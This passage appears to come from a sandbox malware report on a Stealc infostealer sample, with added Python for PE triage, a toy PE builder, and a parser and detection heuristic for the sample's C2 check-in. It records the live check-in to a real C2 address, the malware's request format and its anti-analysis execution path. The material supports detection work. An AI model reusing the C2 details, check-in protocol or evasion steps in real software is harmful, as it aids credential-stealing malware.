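            findings.append("%s: high entropy %.2f" % (label, s.entropy))
        if s.vsize >= 8 * max(s.raw_size, 1):     # ratio chosen for this example
            findings.append("%s: virtual size 0x%x dwarfs raw size 0x%x (unpacking target)"
                            % (label, s.vsize, s.raw_size))
    return findings


def _filler(n: int) -> bytes:
    """Deterministic high-entropy bytes (SHA-256 chain) standing in for packed code."""
    out, seed = bytearray(), b"constructed"
    while len(out) < n:
        seed = hashlib.sha256(seed).digest()
        out += seed
    return bytes(out[:n])


def build_sample_pe() -> bytes:
    """Constructed toy PE32 (not the real sample) with the report's section layout."""
    specs = [  # (name, VirtualAddress, VirtualSize, raw bytes); sizes are multiples of FileAlignment
        (b"", 0x1000, 0x249000, bytes(0x200)),
        (b"smwmjzky", 0x4e7000, 0x1000, _filler(0x1000)),
        (b".taggant", 0x67f000, 0x3000, b"\xe9" + bytes(0x21ff)),
    ]
    headers_end = 0x400
    img = bytearray(b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40))  # e_lfanew = 0x40
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(specs), 0x672FC34F, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)                        # PE32 optional header with 16 data directories
    struct.pack_into("<H", opt, 0, 0x10B)        # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x67f000)    # AddressOfEntryPoint inside .taggant
    struct.pack_into("<I", opt, 28, 0x400000)    # ImageBase
    struct.pack_into("<I", opt, 32, 0x1000)      # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)       # FileAlignment
    struct.pack_into("<I", opt, 92, 16)          # NumberOfRvaAndSizes
    img += opt
    raw_ptr, bodies = headers_end, bytearray()
    for name, va, vsize, raw in specs:
        img += struct.pack("<8sIIIIIIHHI", name, vsize, va, len(raw), raw_ptr,
                           0, 0, 0, 0, 0x40 | RWX)   # IMAGE_SCN_CNT_INITIALIZED_DATA | RWX
        bodies += raw
        raw_ptr += len(raw)
    img += bytes(headers_end - len(img))
    return bytes(img + bodies)
```

Run triage() over a real file's bytes to get the same findings for it; on the toy image it reports the .taggant entry point, the unnamed RWX section with its 0x249000 versus 0x200 size mismatch, three RWX sections and the high-entropy smwmjzky section, while .taggant itself (one jmp opcode and padding) stays near zero entropy, matching the 0.02 in the table.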
Name         RVA       Size   Type                                    Language  Country  ZLIB Complexity
RT_MANIFEST  0x67d43c  0x152  ASCII text, with CRLF line terminators                     0.6479289940828402
DLL           Import
kernel32.dll  lstrcpy
lstrcpy is the only static import; the rest of the API set is resolved at run time through the LoadLibraryA and GetProcAddress chain visible in the execution graph below.
Timestamp                        SID      Signature                                        Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2024-11-21T14:26:09.407143+0100  2044243  ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in  1         192.168.2.4  49730        185.215.113.206  80         TCP
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 21, 2024 14:26:07.511454105 CET  49730        80         192.168.2.4      185.215.113.206
Nov 21, 2024 14:26:07.631191969 CET  80           49730      185.215.113.206  192.168.2.4
Nov 21, 2024 14:26:07.631382942 CET  49730        80         192.168.2.4      185.215.113.206
Nov 21, 2024 14:26:07.631836891 CET  49730        80         192.168.2.4      185.215.113.206
Nov 21, 2024 14:26:07.751394987 CET  80           49730      185.215.113.206  192.168.2.4
Nov 21, 2024 14:26:08.962662935 CET  80           49730      185.215.113.206  192.168.2.4
Nov 21, 2024 14:26:08.962729931 CET  49730        80         192.168.2.4      185.215.113.206
Nov 21, 2024 14:26:08.965436935 CET  49730        80         192.168.2.4      185.215.113.206
Nov 21, 2024 14:26:09.084991932 CET  80           49730      185.215.113.206  192.168.2.4
Nov 21, 2024 14:26:09.407078981 CET  80           49730      185.215.113.206  192.168.2.4
Nov 21, 2024 14:26:09.407143116 CET  49730        80         192.168.2.4      185.215.113.206
Nov 21, 2024 14:26:12.189977884 CET  49730        80         192.168.2.4      185.215.113.206
                        • 185.215.113.206
Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.4  49730        185.215.113.206  80                7112  C:\Users\user\Desktop\file.exe
Timestamp  Bytes transferred  Direction  Data

Nov 21, 2024 14:26:07.631836891 CET  90  OUT
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Nov 21, 2024 14:26:08.962662935 CET  203  IN
HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 13:26:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Nov 21, 2024 14:26:08.965436935 CET  413  OUT
POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGI
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 43 41 42 39 37 39 38 44 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 2d 2d 0d 0a
Data Ascii: ------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="hwid"DFCAB9798DE23924696330------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="build"mars------GDHIEHJEBAAFIDHJEBGI--
(the 211-byte multipart body carries two form fields, hwid=DFCAB9798DE23924696330 and build=mars; the request sends no User-Agent header)

Nov 21, 2024 14:26:09.407078981 CET  210  IN
HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 13:26:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=
(base64 for "block"; no further HTTP request follows in the capture)
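Added example, not from the report: a parser for the check-in exchange above. The request body and the response body are copied from the capture (the body is the Data Ascii with its CRLFs restored, 211 bytes as the Content-Length header says). parse_multipart() pulls the hwid and build fields out of the multipart body, decode_reply() turns YmxvY2s= back into block, and looks_like_this_checkin() is a triage heuristic built only from features visible in this single capture (POST to /<16 hex>.php, no User-Agent, a boundary of four dashes plus twenty upper-case letters, exactly the fields hwid and build). It is not the logic of ET SID 2044243, whose rule text is not on this page, and a heuristic derived from one sample will need tuning against more traffic.

```python
import base64
import re

# Copied from the report's HTTP capture (request at 14:26:08.965, reply at 14:26:09.407).
REQUEST_LINE = "POST /c4becf79229cb002.php HTTP/1.1"
REQUEST_HEADERS = {
    "Content-Type": "multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGI",
    "Host": "185.215.113.206",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}
REQUEST_BODY = (
    b"------GDHIEHJEBAAFIDHJEBGI\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"DFCAB9798DE23924696330\r\n"
    b"------GDHIEHJEBAAFIDHJEBGI\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"mars\r\n"
    b"------GDHIEHJEBAAFIDHJEBGI--\r\n"
)
RESPONSE_BODY = b"YmxvY2s="


def multipart_boundary(content_type: str) -> bytes:
    """Boundary parameter of a multipart/form-data Content-Type (quoted or bare)."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("not multipart/form-data")
    return m.group(2).encode()


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Minimal RFC 7578 reader: {field name: value} for the text parts of the body."""
    delimiter = b"--" + multipart_boundary(content_type)   # body delimiters carry two extra dashes
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):                          # "--boundary--" closes the body
            break
        headers, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', headers)
        if m:
            if value.endswith(b"\r\n"):                     # CRLF before the next delimiter
                value = value[:-2]
            fields[m.group(1).decode()] = value.decode("latin-1")
    return fields


def decode_reply(body: bytes) -> str:
    """The C2 answers with a base64 token; here it decodes to 'block'."""
    return base64.b64decode(body).decode("latin-1")


def looks_like_this_checkin(request_line: str, headers: dict, body: bytes) -> bool:
    """Heuristic derived from this one capture (not the ET rule): POST to /<16 hex>.php,
    no User-Agent, boundary of four dashes plus 20 upper-case letters, fields hwid and build."""
    method, path, _ = request_line.split(" ", 2)
    if method != "POST" or not re.fullmatch(r"/[0-9a-f]{16}\.php", path):
        return False
    if any(k.lower() == "user-agent" for k in headers):
        return False
    content_type = headers.get("Content-Type", "")
    try:
        boundary = multipart_boundary(content_type)
    except ValueError:
        return False
    if not re.fullmatch(rb"-{4}[A-Z]{20}", boundary):
        return False
    return set(parse_multipart(content_type, body)) == {"hwid", "build"}


if __name__ == "__main__":
    print(parse_multipart(REQUEST_HEADERS["Content-Type"], REQUEST_BODY))
    print(decode_reply(RESPONSE_BODY))
    print(looks_like_this_checkin(REQUEST_LINE, REQUEST_HEADERS, REQUEST_BODY))
```

The parser splits on the delimiter from the Content-Type header, so it also copes with captures whose boundary differs from this one; the heuristic deliberately keys on structure (path shape, missing User-Agent, boundary alphabet, field names) rather than on the HWID or build string, which change per victim and per campaign.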



                        Target ID:0
                        Start time:08:26:03
                        Start date:21/11/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x7d0000
                        File size:1'771'008 bytes
                        MD5 hash:215ACB5AD199ADEADC4C630B59F09D17
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1714259793.0000000005190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true


                          Execution Graph

                          Execution Coverage:5.2%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.2%
                          Total number of Nodes:1410
                          Total number of Limit Nodes:28
execution_graph (condensed from the node/edge dump: node IDs dropped, addresses and API labels kept; "|" separates the two targets of a conditional branch, a node in parentheses is an optional side path, "(N API calls)" is the dump's own summary of a library node whose return edges it omits, so successive 7f0xxx nodes are given in dump order; runs of identical edges are collapsed with a count)

Roots listed without incoming edges: 7d8c79 strlen; 7d1b64 (162 API calls); 7dbbf9 (90 API calls); 7ef2f8 (93 API calls); 7ee0f9 (140 API calls); 7e6b79 (138 API calls); 7e4c77 (295 API calls); 7f8471 (121 API calls, 2 library calls)

Unpacking and import resolution
  7f1bf0 -> 7d2a90 -> 43 consecutive calls of 7d4a60 (7d4a76 RtlAllocateHeap -> 7d4ab4 VirtualProtect), one per node 7d2aa1 .. 7d2e52
  7d2e52 -> 7f6390 GetPEB -> 7f65c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA (alternative path: 7f63c3 -> 7f63d7 (20 API calls) -> 7f65c3)
  7f65c3 -> (7f6625 GetProcAddress) -> 7f6638 -> (7f6641 GetProcAddress GetProcAddress) -> 7f666c -> (7f6675 GetProcAddress) -> 7f6688 -> (7f6691 GetProcAddress) -> 7f66a4 -> (7f66ad GetProcAddress GetProcAddress) -> 7f66d7 -> 7f1c03

Environment checks, each with an ExitProcess exit
  7f1c03 -> (7f1c29 lstrcpy) -> 7f1c35 -> 7f1c65 ExitProcess | 7f1c6d GetSystemInfo
  7f1c6d GetSystemInfo -> 7f1c7d ExitProcess | 7f1c85 -> 7d1030 GetCurrentProcess VirtualAllocExNuma
  7d1030 -> 7d1057 ExitProcess | 7d105e VirtualAlloc -> 7d107d -> (7d108a VirtualFree) -> 7d10b1 -> 7d10c0 -> 7d10d0 GlobalMemoryStatusEx
  7d10d0 -> 7d1112 ExitProcess | 7d10f5 -> 7d1112 ExitProcess | 7d111a GetUserDefaultLangID
  7d111a -> 7f1ca2 -> 7f1cb0 ExitProcess | 7f1cb8 -> 7f2ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA -> 7f2b24 -> 7f1cbd
  7f1cbd -> 7f2a40 GetProcessHeap RtlAllocateHeap GetUserNameA -> 7f1cd1 -> 7f1ce0 ExitProcess | 7f1ce7 lstrlen
  7f1ce7 lstrlen -> 7f1cff -> (7f1d13 lstrcpy lstrcat) -> 7f1d23 lstrlen -> 7f1d39 -> (7f1d46 lstrcpy lstrcat) -> 7f1d5a -> 7f2ad0 (3 API calls) -> 7f1d5f lstrlen -> 7f1d74 -> (7f1d87 lstrcpy lstrcat) -> 7f1d9a lstrlen -> 7f1db0 -> (7f1dba lstrcpy lstrcat) -> 7f1dce -> 7f2a40 GetProcessHeap RtlAllocateHeap GetUserNameA -> 7f1dd3 lstrlen -> 7f1de7 -> (7f1df7 lstrcpy lstrcat) -> 7f1e0a -> (7f1e28 lstrcpy) -> 7f1e30 -> 7f1e56 OpenEventA
  7f1e56 OpenEventA -> 7f1e8c CreateEventA | 7f1e68 CloseHandle Sleep OpenEventA (loops on itself, then 7f1e8c CreateEventA)
  7f1e8c CreateEventA -> 7f1b20 GetSystemTime -> 7f1820 (string assembly: alternating lstrlen and lstrcpy lstrcat pairs over 7f182e .. 7f1b08) -> 7f1b81 sscanf -> 7d2a20 -> 7d2a24 SystemTimeToFileTime SystemTimeToFileTime -> 7f1bd6 -> 7f1be2 ExitProcess | 7f1be9 -> 7effd0
  7f1ea5 CloseHandle ExitProcess is the normal end, reached from 7f0e95

Configuration strings
  7effd0 -> 7effe0 -> (7f000d lstrcpy) -> 7f0019 lstrlen -> 7f00d0 -> (7f00db lstrcpy) -> 7f00e7 lstrlen -> 7f00ff -> (7f010a lstrcpy) -> 7f0116 lstrlen -> 7f012e -> (7f0139 lstrcpy) -> 7f0145 -> 7f1570 (7f157f -> optional lstrcpy at 7f159f, 7f15d7 and 7f160f -> 7f1617 -> (7f1647 lstrcpy) -> 7f0155 lstrlen) -> 7f016e -> (7f0183 lstrcpy) -> 7f018f lstrlen -> 7f01a8 -> (7f01bd lstrcpy) -> 7f01c9 lstrlen -> 7f01e8 -> (7f0200 lstrcpy) -> 7f020c lstrlen -> 7f026a -> (7f0282 lstrcpy) -> 7f028e -> 7d2e70
  7d2e70 -> a second run of 7d4a60 (RtlAllocateHeap, VirtualProtect) calls, one per node 7d2e82 .. 7d3c39 and beyond (156 visible); the dump is cut off inside this run

Collection (the predecessor of 7f0540 lies in the cut-off part of the dump)
  7f0540 -> 7f1570 (4 API calls) -> 7f054f -> (7f0599 lstrcpy) -> 7f05a1 lstrlen -> 7f05bf -> (7f05d1 lstrcpy lstrcat) -> 7f05e9 -> (7f060c lstrcpy) -> 7f0614 -> 7f061b lstrlen -> 7f0636 -> (7f064a lstrcpy lstrcat) -> 7f0662 -> (7f067f lstrcpy) -> 7f0687 -> 7f068e lstrlen -> 7f06b3 -> (7f06c7 lstrcpy lstrcat) -> 7f06db -> (7f0704 lstrcpy) -> 7f070c -> (7f0749 lstrcpy) -> 7f0751 -> 7f2740 GetWindowsDirectoryA -> 7f075d -> (7f077d lstrcpy) -> 7f0785 -> 7d4c50 -> 7f078f -> 7e8ca0 StrCmpCA -> 7f079b
  From 7f079b on, every module is dispatched the same way: 7d1530 (8 API calls) -> 7f0xxx -> optional lstrcpy -> worker; in dump order:
    7f07bc -> 7d60d0 (80 API calls) -> 7f07fa -> 7e81b0 (10 API calls)
    7f082f -> 7d60d0 (80 API calls) -> 7f086b -> 7e7ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA
    7f08a1 -> 7d60d0 (80 API calls) -> 7f08db -> 7e8050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy
    7f08f7 -> 7d5640 (8 API calls)
    7f094c -> 7e7280 (1498 API calls)
    7f09cf -> 7d60d0 (80 API calls) -> 7f0a0b -> 7e83e0 (7 API calls)
    7f0a29 -> 7d24e0 (230 API calls) -> 7f0a6b -> 7f0a7f | 7f0b40
      7f0a7f: 7f0aa5 -> 7d60d0 (80 API calls) -> 7f0ada -> 7e85b0 (47 API calls) -> 7f0ae5 -> 7f0af6 -> 7ed0f0 (118 API calls)
      7f0b40: 7f0b59 -> 7d60d0 (80 API calls) -> 7f0b8d -> 7ec840 (70 API calls)
    7f0b38 -> 7f0bb9 -> 7ed7b0 (103 API calls, __setmbcp_nolock); 7f0bbe -> 7f0bcc -> 7eecb0 (98 API calls)
    7f0bd1 -> 7f0bf5 -> 7edfa0 (149 API calls); 7f0bfa -> 7f0c1e -> 7ee500 (108 API calls); 7f0c23 -> 7f0c47 -> 7ee720 (120 API calls); 7f0c4c -> 7f0c70 -> 7ee9e0 (110 API calls); 7f0c75 -> 7f0c99 -> 7d7bc0 (154 API calls); 7f0c9e -> 7f0cc2 -> 7eeb70 (108 API calls); 7f0cc7 -> 7f0ceb -> 7f41e0 (91 API calls); 7f0cf0 -> 7f0d04 | 7f0dca
      7f0d04: 7f0d2a -> 7d60d0 (80 API calls) -> 7f0d64 -> 7e85b0 (47 API calls) -> 7f0d6f -> 7f0d80 -> 7ed0f0 (118 API calls)
      7f0dca: 7f0de3 -> 7f0e11 -> 7d60d0 (80 API calls) -> 7f0e17 -> 7ec840 (70 API calls)
    7f0dc2 -> 7f0e39 -> 7f0e67 -> 7d60d0 (80 API calls) -> 7f0e74 -> (7f1660, 12 API calls) -> 7f0e95 -> 7f1ea5 CloseHandle ExitProcess
API calls 26209->26210 26211 7d3c52 26210->26211 26212 7d4a60 2 API calls 26211->26212 26213 7d3c68 26212->26213 26214 7d4a60 2 API calls 26213->26214 26215 7d3c7e 26214->26215 26216 7d4a60 2 API calls 26215->26216 26217 7d3c94 26216->26217 26218 7d4a60 2 API calls 26217->26218 26219 7d3caa 26218->26219 26220 7d4a60 2 API calls 26219->26220 26221 7d3cc0 26220->26221 26222 7d4a60 2 API calls 26221->26222 26223 7d3cd9 26222->26223 26224 7d4a60 2 API calls 26223->26224 26225 7d3cef 26224->26225 26226 7d4a60 2 API calls 26225->26226 26227 7d3d05 26226->26227 26228 7d4a60 2 API calls 26227->26228 26229 7d3d1b 26228->26229 26230 7d4a60 2 API calls 26229->26230 26231 7d3d31 26230->26231 26232 7d4a60 2 API calls 26231->26232 26233 7d3d47 26232->26233 26234 7d4a60 2 API calls 26233->26234 26235 7d3d60 26234->26235 26236 7d4a60 2 API calls 26235->26236 26237 7d3d76 26236->26237 26238 7d4a60 2 API calls 26237->26238 26239 7d3d8c 26238->26239 26240 7d4a60 2 API calls 26239->26240 26241 7d3da2 26240->26241 26242 7d4a60 2 API calls 26241->26242 26243 7d3db8 26242->26243 26244 7d4a60 2 API calls 26243->26244 26245 7d3dce 26244->26245 26246 7d4a60 2 API calls 26245->26246 26247 7d3de7 26246->26247 26248 7d4a60 2 API calls 26247->26248 26249 7d3dfd 26248->26249 26250 7d4a60 2 API calls 26249->26250 26251 7d3e13 26250->26251 26252 7d4a60 2 API calls 26251->26252 26253 7d3e29 26252->26253 26254 7d4a60 2 API calls 26253->26254 26255 7d3e3f 26254->26255 26256 7d4a60 2 API calls 26255->26256 26257 7d3e55 26256->26257 26258 7d4a60 2 API calls 26257->26258 26259 7d3e6e 26258->26259 26260 7d4a60 2 API calls 26259->26260 26261 7d3e84 26260->26261 26262 7d4a60 2 API calls 26261->26262 26263 7d3e9a 26262->26263 26264 7d4a60 2 API calls 26263->26264 26265 7d3eb0 26264->26265 26266 7d4a60 2 API calls 26265->26266 26267 7d3ec6 26266->26267 26268 7d4a60 2 API calls 26267->26268 26269 7d3edc 26268->26269 26270 7d4a60 2 API calls 26269->26270 26271 7d3ef5 26270->26271 26272 7d4a60 2 API calls 
26271->26272 26273 7d3f0b 26272->26273 26274 7d4a60 2 API calls 26273->26274 26275 7d3f21 26274->26275 26276 7d4a60 2 API calls 26275->26276 26277 7d3f37 26276->26277 26278 7d4a60 2 API calls 26277->26278 26279 7d3f4d 26278->26279 26280 7d4a60 2 API calls 26279->26280 26281 7d3f63 26280->26281 26282 7d4a60 2 API calls 26281->26282 26283 7d3f7c 26282->26283 26284 7d4a60 2 API calls 26283->26284 26285 7d3f92 26284->26285 26286 7d4a60 2 API calls 26285->26286 26287 7d3fa8 26286->26287 26288 7d4a60 2 API calls 26287->26288 26289 7d3fbe 26288->26289 26290 7d4a60 2 API calls 26289->26290 26291 7d3fd4 26290->26291 26292 7d4a60 2 API calls 26291->26292 26293 7d3fea 26292->26293 26294 7d4a60 2 API calls 26293->26294 26295 7d4003 26294->26295 26296 7d4a60 2 API calls 26295->26296 26297 7d4019 26296->26297 26298 7d4a60 2 API calls 26297->26298 26299 7d402f 26298->26299 26300 7d4a60 2 API calls 26299->26300 26301 7d4045 26300->26301 26302 7d4a60 2 API calls 26301->26302 26303 7d405b 26302->26303 26304 7d4a60 2 API calls 26303->26304 26305 7d4071 26304->26305 26306 7d4a60 2 API calls 26305->26306 26307 7d408a 26306->26307 26308 7d4a60 2 API calls 26307->26308 26309 7d40a0 26308->26309 26310 7d4a60 2 API calls 26309->26310 26311 7d40b6 26310->26311 26312 7d4a60 2 API calls 26311->26312 26313 7d40cc 26312->26313 26314 7d4a60 2 API calls 26313->26314 26315 7d40e2 26314->26315 26316 7d4a60 2 API calls 26315->26316 26317 7d40f8 26316->26317 26318 7d4a60 2 API calls 26317->26318 26319 7d4111 26318->26319 26320 7d4a60 2 API calls 26319->26320 26321 7d4127 26320->26321 26322 7d4a60 2 API calls 26321->26322 26323 7d413d 26322->26323 26324 7d4a60 2 API calls 26323->26324 26325 7d4153 26324->26325 26326 7d4a60 2 API calls 26325->26326 26327 7d4169 26326->26327 26328 7d4a60 2 API calls 26327->26328 26329 7d417f 26328->26329 26330 7d4a60 2 API calls 26329->26330 26331 7d4198 26330->26331 26332 7d4a60 2 API calls 26331->26332 26333 7d41ae 26332->26333 26334 7d4a60 2 API calls 26333->26334 
26335 7d41c4 26334->26335 26336 7d4a60 2 API calls 26335->26336 26337 7d41da 26336->26337 26338 7d4a60 2 API calls 26337->26338 26339 7d41f0 26338->26339 26340 7d4a60 2 API calls 26339->26340 26341 7d4206 26340->26341 26342 7d4a60 2 API calls 26341->26342 26343 7d421f 26342->26343 26344 7d4a60 2 API calls 26343->26344 26345 7d4235 26344->26345 26346 7d4a60 2 API calls 26345->26346 26347 7d424b 26346->26347 26348 7d4a60 2 API calls 26347->26348 26349 7d4261 26348->26349 26350 7d4a60 2 API calls 26349->26350 26351 7d4277 26350->26351 26352 7d4a60 2 API calls 26351->26352 26353 7d428d 26352->26353 26354 7d4a60 2 API calls 26353->26354 26355 7d42a6 26354->26355 26356 7d4a60 2 API calls 26355->26356 26357 7d42bc 26356->26357 26358 7d4a60 2 API calls 26357->26358 26359 7d42d2 26358->26359 26360 7d4a60 2 API calls 26359->26360 26361 7d42e8 26360->26361 26362 7d4a60 2 API calls 26361->26362 26363 7d42fe 26362->26363 26364 7d4a60 2 API calls 26363->26364 26365 7d4314 26364->26365 26366 7d4a60 2 API calls 26365->26366 26367 7d432d 26366->26367 26368 7d4a60 2 API calls 26367->26368 26369 7d4343 26368->26369 26370 7d4a60 2 API calls 26369->26370 26371 7d4359 26370->26371 26372 7d4a60 2 API calls 26371->26372 26373 7d436f 26372->26373 26374 7d4a60 2 API calls 26373->26374 26375 7d4385 26374->26375 26376 7d4a60 2 API calls 26375->26376 26377 7d439b 26376->26377 26378 7d4a60 2 API calls 26377->26378 26379 7d43b4 26378->26379 26380 7d4a60 2 API calls 26379->26380 26381 7d43ca 26380->26381 26382 7d4a60 2 API calls 26381->26382 26383 7d43e0 26382->26383 26384 7d4a60 2 API calls 26383->26384 26385 7d43f6 26384->26385 26386 7d4a60 2 API calls 26385->26386 26387 7d440c 26386->26387 26388 7d4a60 2 API calls 26387->26388 26389 7d4422 26388->26389 26390 7d4a60 2 API calls 26389->26390 26391 7d443b 26390->26391 26392 7d4a60 2 API calls 26391->26392 26393 7d4451 26392->26393 26394 7d4a60 2 API calls 26393->26394 26395 7d4467 26394->26395 26396 7d4a60 2 API calls 26395->26396 26397 7d447d 
26396->26397 26398 7d4a60 2 API calls 26397->26398 26399 7d4493 26398->26399 26400 7d4a60 2 API calls 26399->26400 26401 7d44a9 26400->26401 26402 7d4a60 2 API calls 26401->26402 26403 7d44c2 26402->26403 26404 7d4a60 2 API calls 26403->26404 26405 7d44d8 26404->26405 26406 7d4a60 2 API calls 26405->26406 26407 7d44ee 26406->26407 26408 7d4a60 2 API calls 26407->26408 26409 7d4504 26408->26409 26410 7d4a60 2 API calls 26409->26410 26411 7d451a 26410->26411 26412 7d4a60 2 API calls 26411->26412 26413 7d4530 26412->26413 26414 7d4a60 2 API calls 26413->26414 26415 7d4549 26414->26415 26416 7d4a60 2 API calls 26415->26416 26417 7d455f 26416->26417 26418 7d4a60 2 API calls 26417->26418 26419 7d4575 26418->26419 26420 7d4a60 2 API calls 26419->26420 26421 7d458b 26420->26421 26422 7d4a60 2 API calls 26421->26422 26423 7d45a1 26422->26423 26424 7d4a60 2 API calls 26423->26424 26425 7d45b7 26424->26425 26426 7d4a60 2 API calls 26425->26426 26427 7d45d0 26426->26427 26428 7d4a60 2 API calls 26427->26428 26429 7d45e6 26428->26429 26430 7d4a60 2 API calls 26429->26430 26431 7d45fc 26430->26431 26432 7d4a60 2 API calls 26431->26432 26433 7d4612 26432->26433 26434 7d4a60 2 API calls 26433->26434 26435 7d4628 26434->26435 26436 7d4a60 2 API calls 26435->26436 26437 7d463e 26436->26437 26438 7d4a60 2 API calls 26437->26438 26439 7d4657 26438->26439 26440 7d4a60 2 API calls 26439->26440 26441 7d466d 26440->26441 26442 7d4a60 2 API calls 26441->26442 26443 7d4683 26442->26443 26444 7d4a60 2 API calls 26443->26444 26445 7d4699 26444->26445 26446 7d4a60 2 API calls 26445->26446 26447 7d46af 26446->26447 26448 7d4a60 2 API calls 26447->26448 26449 7d46c5 26448->26449 26450 7d4a60 2 API calls 26449->26450 26451 7d46de 26450->26451 26452 7d4a60 2 API calls 26451->26452 26453 7d46f4 26452->26453 26454 7d4a60 2 API calls 26453->26454 26455 7d470a 26454->26455 26456 7d4a60 2 API calls 26455->26456 26457 7d4720 26456->26457 26458 7d4a60 2 API calls 26457->26458 26459 7d4736 26458->26459 
26460 7d4a60 2 API calls 26459->26460 26461 7d474c 26460->26461 26462 7d4a60 2 API calls 26461->26462 26463 7d4765 26462->26463 26464 7d4a60 2 API calls 26463->26464 26465 7d477b 26464->26465 26466 7d4a60 2 API calls 26465->26466 26467 7d4791 26466->26467 26468 7d4a60 2 API calls 26467->26468 26469 7d47a7 26468->26469 26470 7d4a60 2 API calls 26469->26470 26471 7d47bd 26470->26471 26472 7d4a60 2 API calls 26471->26472 26473 7d47d3 26472->26473 26474 7d4a60 2 API calls 26473->26474 26475 7d47ec 26474->26475 26476 7d4a60 2 API calls 26475->26476 26477 7d4802 26476->26477 26478 7d4a60 2 API calls 26477->26478 26479 7d4818 26478->26479 26480 7d4a60 2 API calls 26479->26480 26481 7d482e 26480->26481 26482 7d4a60 2 API calls 26481->26482 26483 7d4844 26482->26483 26484 7d4a60 2 API calls 26483->26484 26485 7d485a 26484->26485 26486 7d4a60 2 API calls 26485->26486 26487 7d4873 26486->26487 26488 7d4a60 2 API calls 26487->26488 26489 7d4889 26488->26489 26490 7d4a60 2 API calls 26489->26490 26491 7d489f 26490->26491 26492 7d4a60 2 API calls 26491->26492 26493 7d48b5 26492->26493 26494 7d4a60 2 API calls 26493->26494 26495 7d48cb 26494->26495 26496 7d4a60 2 API calls 26495->26496 26497 7d48e1 26496->26497 26498 7d4a60 2 API calls 26497->26498 26499 7d48fa 26498->26499 26500 7d4a60 2 API calls 26499->26500 26501 7d4910 26500->26501 26502 7d4a60 2 API calls 26501->26502 26503 7d4926 26502->26503 26504 7d4a60 2 API calls 26503->26504 26505 7d493c 26504->26505 26506 7d4a60 2 API calls 26505->26506 26507 7d4952 26506->26507 26508 7d4a60 2 API calls 26507->26508 26509 7d4968 26508->26509 26510 7d4a60 2 API calls 26509->26510 26511 7d4981 26510->26511 26512 7d4a60 2 API calls 26511->26512 26513 7d4997 26512->26513 26514 7d4a60 2 API calls 26513->26514 26515 7d49ad 26514->26515 26516 7d4a60 2 API calls 26515->26516 26517 7d49c3 26516->26517 26518 7d4a60 2 API calls 26517->26518 26519 7d49d9 26518->26519 26520 7d4a60 2 API calls 26519->26520 26521 7d49ef 26520->26521 26522 7d4a60 2 
